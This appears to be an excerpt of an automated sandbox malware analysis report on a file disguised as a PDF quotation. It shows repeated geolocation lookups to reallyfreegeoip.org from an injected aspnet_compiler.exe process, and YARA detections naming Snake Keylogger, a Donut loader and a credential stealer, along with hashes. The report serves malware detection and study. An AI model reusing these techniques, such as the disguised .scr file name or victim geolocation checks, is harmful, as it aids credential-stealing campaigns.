2024-11-18 10:45:58 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49950	188.114.96.3	443	2928	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 10:45:59 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 10:45:59 UTC	854	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:45:59 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 28242 Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UtYO2jPwvd0g%2FDahe8DcRuEqOhjniQSwEsjoqbnG4KJdL5evd3qBTDGl%2FiuEbaSzQZCjIqDJiuYeCCZun%2BtX1%2F3bRAC84KFmKLGyYWuyE3ecUvAa0ExeKRSH87ZvRdCS%2Fd6yjRjO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e475fc61b6f6bb6-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1809&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1571351&cwnd=250&unsent_bytes=0&cid=badef94d310625dd&ts=148&x=0"
2024-11-18 10:45:59 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49970	188.114.96.3	443	2928	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 10:46:02 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 10:46:02 UTC	856	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:46:02 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 28245 Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5hxWwBCTgb%2BZLILVAHir21dNcDBuQXFCMMUg1RH%2B%2B1tLxVychHvcJuuSG4fV9kTm60BXy0lOl2ZdUYO%2FM4EYNw%2BTJHzdROoI9zOGNGcgXhfGAv2yXTS%2BXHORIEJXNxVGc5fQqKyG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e475fd7eda047a5-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1062&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2562831&cwnd=251&unsent_bytes=0&cid=748619f754dcc809&ts=144&x=0"
2024-11-18 10:46:02 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49980	188.114.96.3	443	2928	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 10:46:03 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 10:46:03 UTC	854	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:46:03 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 28246 Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iXXOFzr7IcU%2FGOeWHlL3HgDfW61t%2BZbkhwefeHcpXlWkpvIoX%2F8NQbA2g57Jl04gMeiV9EMmzRUEH3SBT0O%2B3VLMoNSLMCshyKyFE67OLQ%2FGDjFOL2WEoTBH7Yw5V5OVRhSOqkC6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e475fe218c76c1a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1156&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2483704&cwnd=251&unsent_bytes=0&cid=5d470df542ff8b58&ts=147&x=0"
2024-11-18 10:46:03 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49987	188.114.96.3	443	2928	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 10:46:05 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 10:46:05 UTC	850	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:46:05 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 28248 Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y5MTBbyLX6yBxWXFMEc1q8VVPy8PfeCBvOhrGdUW4oPXDe8oZe0uiv%2BtcNtcQhGdvibX7aIa4AFVmld2GCoNOlEw7sbCiQ0PegSG2Sw7XrK9SRwRSM5fWNRzGCF3Nbi9u%2FKeg%2FWn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e475fec7eee468a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1733&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1641723&cwnd=251&unsent_bytes=0&cid=41e530533d80c9b0&ts=149&x=0"
2024-11-18 10:46:05 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49989	188.114.96.3	443	2928	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 10:46:07 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 10:46:07 UTC	860	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:46:07 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 28250 Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qcFxj7a7%2BgQD6QRPZt947yheFJ3DN3FU%2FQMn%2Bgu%2Fp4d7QwqM4vTdg2MI3xc2AlTO16EXSTaHU0MgqiaWMYOI5JoBKMws47wL0cVfK75cGmkIiWi%2BaAWgIDR6Gq%2BJCQB%2F%2FqAMHCXj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e475ff69d8c45fa-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2219&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1276333&cwnd=239&unsent_bytes=0&cid=00164251a57fe7c5&ts=148&x=0"
2024-11-18 10:46:07 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49991	188.114.96.3	443	2928	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 10:46:08 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 10:46:08 UTC	854	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:46:08 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 28251 Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dh%2BWlKKQOWV4Rb8CULZw68VtqtrEXLx%2FsLszCvhde8cai9ln%2BtF3MKnKjrmCfLSSm1ffUIuyEswmz8%2BK3pyCY95J0xb4%2FGJAISYCln5XI7w70cf1BNNmvKYyw4RVTuYcHHizD86P"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e476000d945464a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1144&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2456318&cwnd=236&unsent_bytes=0&cid=3c8244dc534a0861&ts=148&x=0"
2024-11-18 10:46:08 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49993	188.114.96.3	443	2928	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 10:46:10 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 10:46:10 UTC	852	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 10:46:10 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 28253 Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RaiJ41yKGz6UjtRUwoXJIjGXeZ1C3Ouh%2BPkppKSsGw%2BT8p9N1xIPaqQsuJbgbo4DjEFb0kctuydoZDtImExz7NjeynrCxAW7OrNn48PGnO8HCeRGp3hWkE%2FXHknpJ8OAuNtf%2F5sH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e47600ae95eeae1-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1191&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2429530&cwnd=240&unsent_bytes=0&cid=b1d8cdb736c2edcf&ts=141&x=0"
2024-11-18 10:46:10 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Target ID:	0
Start time:	05:45:04
Start date:	18/11/2024
Path:	C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe"
Imagebase:	0x21fa1590000
File size:	1'484'288 bytes
MD5 hash:	9C6DE69B3F4BD16DC76A37FD8A50AEA4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2632327224.0000021FBBEA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2622093932.0000021FA370A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2622093932.0000021FA348E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:45:55
Start date:	18/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x25893670000
File size:	55'824 bytes
MD5 hash:	DF5419B32657D2896514B6A1D041FE08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000004.00000002.3366738484.00000258936F0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3368058853.000002589568D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3368058853.0000025895441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	05:45:55
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 00007FF849082328 Relevance: 1.8, Instructions: 1776COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea1175e15fbf77df04277ad261904bda3dec70943b008d003a56a3b387d8c24
Instruction ID: 2760b9a6dd389633b7912a465fd8b2b64a9bb3608e693db124832bb6cf47300a
Opcode Fuzzy Hash: dea1175e15fbf77df04277ad261904bda3dec70943b008d003a56a3b387d8c24
Instruction Fuzzy Hash: 7AD2A670A1CA898FDFA4EF28C495BA97BE1FF59340F5541A9D04DD7292CA35EC82CB40

Function 00007FF848E63220 Relevance: 1.5, Instructions: 1451COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2633943252.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848e60000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbc27db74f6c0b6636eb94e3c762799f78990829433c3467015a8a1168c175a3
Instruction ID: 54c17bf8889c09f9c598019b6d7d51a068b0d4b20c9e8b7aa3dc151956380ad2
Opcode Fuzzy Hash: bbc27db74f6c0b6636eb94e3c762799f78990829433c3467015a8a1168c175a3
Instruction Fuzzy Hash: D8C2C27040E6894FD31BDB68D4A46A5BFE0FF45314F984BEEC08B8B9A2C6393592C745

Function 00007FF8490888A0 Relevance: .8, Instructions: 791COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2636138183.00007FF849080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849080000_QUOTATION_NOVQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49b0b2571044675091209a85c21ff5c1a60aa9dfc26f3f228c1e9defa72db453
Instruction ID: ee6654609006185b34b7f5b8e45d7a56dbe70bd8ffd1027e3401da109d7537b2
Opcode Fuzzy Hash: 49b0b2571044675091209a85c21ff5c1a60aa9dfc26f3f228c1e9defa72db453
